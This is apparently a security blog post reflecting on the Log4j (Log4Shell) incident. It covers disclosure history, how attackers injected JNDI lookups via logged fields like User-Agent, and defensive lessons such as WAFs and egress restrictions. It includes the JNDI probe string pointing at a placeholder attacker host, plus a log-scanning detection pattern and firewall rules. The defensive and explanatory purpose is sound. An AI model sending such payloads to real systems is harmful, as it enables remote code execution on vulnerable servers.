If you’re in the software industry, you were probably shaking your head when the first alerts came out about the Log4j vulnerability. If you were in the information security sector, it was shaping up to be a long weekend as you tried to assess the extent of the vulnerability and figure out how to monitor for possible exploits. If you were a developer, you probably spent the weekend applying patches that seemed to arrive almost daily. The bottom line was that this one could have been a lot worse had we not all been through a few of these incidents before, SolarWinds coming to mind. Nonetheless, we all rallied to make this as much of a non-event as possible so that everyone could have a wonderful holiday season.
The vulnerability had the makings of something bad: merely logging a string that contained a JNDI lookup could cause an application server, more specifically a Java application, to trigger Log4j into loading and running malicious code. The early exploits focused on LDAP calls that loaded an object, represented as a byte array, from a remote server and then ran the loaded code. Once the program called Log4j to log the string, it was game on, as the framework would do exactly what it was told, a “feature” introduced in a change package in 2013. We had even been warned about this class of attack in a presentation at Black Hat in 2016. But up to this point, nothing had ever come of the vulnerability.
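To make the mechanics concrete, the widely documented probe string takes roughly this shape (the host name here is a placeholder for illustration, not a real attacker server). Any vulnerable Log4j 2.x code path that logged it, for example `logger.error(userInput)`, would perform the JNDI lookup:

```shell
# The documented Log4Shell probe format. When a vulnerable Log4j 2.x instance
# logs this string, the ${jndi:...} lookup contacts the named LDAP server,
# which can hand back a reference to remote code. "attacker.example" is a
# placeholder host, not a real server.
PAYLOAD='${jndi:ldap://attacker.example/Exploit}'
printf '%s\n' "$PAYLOAD"
```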
That was until a researcher on Alibaba’s Cloud Security team, Chen Zhaojun, discovered the flaw and alerted the Apache Software Foundation in late November. While not all the details are available, it seems the Log4j contributors were working on a patch with Mr. Chen when he warned them that users of a Chinese forum were already discussing the flaw and preparing to exploit it. When the first exploit surfaced on the gaming platform Minecraft, the rush to disclose and patch accelerated, and the software world started scrambling on a Friday to assess how exposed their organizations were.
What made this vulnerability more dangerous was that it sat in a logging framework used throughout the world for its simplicity, efficiency, and ease of implementation. Not only did software developers leverage the framework directly, but the tools they used leveraged it as well, making it even harder to determine whether you were vulnerable. It highlighted yet another problem in the software supply chain, where a single vulnerable component could put your whole organization at risk.
What is disturbing is that after the Chinese researcher revealed the vulnerability to the ASF, the Chinese government, more specifically its Ministry of Industry and Information Technology (MIIT), suspended a cooperative partnership with Alibaba over the incident, citing that Alibaba had not alerted MIIT in a timely fashion. It’s not clear what might have happened had Alibaba alerted China first before notifying the ASF. One fear is that the Chinese government could have embargoed disclosure until it had weaponized the vulnerability for its own purposes. The action casts a chill over how future security issues might be handled in China.
Exploiting the Vulnerability
As for the vulnerability itself, the ease of exploitation is what worried many companies, since any string sent in a web request could trigger an exploit. Just putting the string in a field on a web page could trigger it if the field was logged, as could placing it in the request headers. Probably the most exploited field was the User-Agent field in the HTTP header, since most companies log the user agent for debugging and metrics. But if you weren’t logging those fields, the vulnerability posed no risk, a point that was probably one of the hardest to explain to senior management, who were rightfully worried.
Likewise, if the exploit was not properly formatted, there was no risk. That was actually kind of fun to watch as the attempts came rolling in. We found people simply copying and pasting sample exploits from websites as if those samples would accomplish the task. In other cases, we saw reconnaissance attempts in which attributes of the system were sent in the request as attackers tried to gather more insight into the systems they were probing. As the signatures expanded to cover RMI and CORBA, the variety of attacks grew.
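A rough sketch of what those evolving signatures matched, which can also be used to sweep your own access logs for probe attempts. The log path is an assumption for illustration, and real WAF signatures were broader, also catching obfuscated variants like `${${lower:j}ndi:...}`:

```shell
# Scan web server access logs for Log4Shell probe strings, covering the LDAP,
# RMI, and CORBA/IIOP schemes as the signatures expanded. The default log
# path is an assumption; adjust for your environment.
ACCESS_LOG="${ACCESS_LOG:-/var/log/nginx/access.log}"
JNDI_PATTERN='\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba):'
grep -icE "$JNDI_PATTERN" "$ACCESS_LOG" 2>/dev/null || echo "no probes found"
```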
Many organizations already had a layer of protection in place through Web Application Firewalls (WAFs) or next-generation firewalls such as those from Palo Alto Networks. As the exploit signatures evolved, these vendors updated their threat signatures to keep the malicious requests from even coming in the door. In almost all cases, the bulk of the threats were stopped at the firewall, logged, and dropped.
Even if an exploit was properly formatted, made it through the door, and attempted to download malicious code, it was rendered harmless if the network didn’t allow the server to reach the Internet, since the payload could never be fetched. That’s something I pointed out in a prior blog entry about the SolarWinds attack. Application servers should not be allowed to connect to the Internet without restrictions, especially those critical to the core operations of your business. When you think about this exploit, the servers most affected were application servers, which should already sit at least two layers back from the Internet.
Most organizations put their web servers, usually Apache HTTP Server or Nginx, at the perimeter. Those are written in C and were not subject to this attack. The application servers, usually built on Tomcat or other Java-based platforms, have no reason to touch the Internet at all, much less do so without restrictions. If an application server must reach out to the Internet, it should be restricted to known sites. That’s a lesson we should all have learned from SolarWinds.
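As a sketch of what that restriction can look like at the host level, assuming iptables (all addresses and destinations below are hypothetical placeholders; many shops would implement the same policy in network firewalls instead):

```shell
# Default-deny egress for an application server; allow only known destinations.
# Every address below is a placeholder for illustration.
iptables -P OUTPUT DROP                                          # default: no outbound
iptables -A OUTPUT -o lo -j ACCEPT                               # loopback traffic
iptables -A OUTPUT -d 10.0.20.0/24 -j ACCEPT                     # internal service tier
iptables -A OUTPUT -d 203.0.113.10 -p tcp --dport 443 -j ACCEPT  # one approved external API
```

With a policy like this in place, a server that logs a JNDI payload still cannot reach the attacker’s LDAP server to fetch the malicious class.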
Just as we learned more about our environments with SolarWinds, this incident has forced us to review them again to make sure we are ready for the next one, and there will be more. Systems will always rely on externally sourced frameworks; they give us the ability to write robust software at higher quality and lower cost. But trusting these frameworks to be bulletproof is foolish. The best approach is to leverage them while placing controls around them to protect the organization.
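One concrete piece of that review is simply inventorying where Log4j lives on each host, including copies bundled inside vendor tools. A minimal sketch, where the search root and jar naming are assumptions; note that shaded “fat” jars can embed Log4j classes without a matching file name, so file searches alone are not conclusive:

```shell
# List Log4j core jars under a directory tree. The default root is an
# assumption; point SEARCH_ROOT at your application install trees. Shaded
# jars that embed Log4j classes will not show up in a name-based search.
SEARCH_ROOT="${SEARCH_ROOT:-/opt}"
find "$SEARCH_ROOT" -name 'log4j-core-*.jar' 2>/dev/null || true
```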
Knowing your software portfolio, scanning for vulnerabilities, and controlling the networks your servers live in are the keys to maintaining a secure environment. Based on the low number of reported exploits, I believe we all dodged a bullet on this one. It was a wild two weeks leading into Christmas, but my guess is almost all of us got to enjoy the holidays thanks to some proactive security work. We might not be so lucky next time.